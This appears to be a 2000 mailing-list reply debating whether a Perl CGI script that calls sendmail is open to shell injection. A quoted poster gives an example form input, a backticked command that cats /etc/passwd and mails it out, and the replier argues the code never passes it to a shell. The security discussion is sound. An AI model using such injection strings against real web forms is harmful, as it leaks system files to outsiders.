* Wesley Wannemacher <[EMAIL PROTECTED]> [001113 15:09]:
> I could be a little bit off-base, but it might be a bad idea to
> approach your problem this way. For instance, what if a person enters
> somewhere in the form:
> `cat /etc/passwd | mail -s "You dumb f***, you just got hacked"
> [EMAIL PROTECTED]`
Where exactly would that line be exec'd? There is only one place in the
included code where stuff gets executed...there isn't any place to sneak
your little command to the shell.
> It is notoriously bad to /usr/lib/sendmail from a CGI script. Try
Nah, it isn't all that bad. Especially since he isn't passing any
possibly-tainted data to the shell (in the open() line).
/pg
--
Peter Green : Gospel Communications Network, SysAdmin : [EMAIL PROTECTED]
---
The wise man can pick up a grain of sand and envision a whole universe. But
the stupid man will just lay down on some seaweed and roll around until he's
completely draped in it. Then he'll stand up and go: Hey, I'm Vine Man.
(Jack Handey)
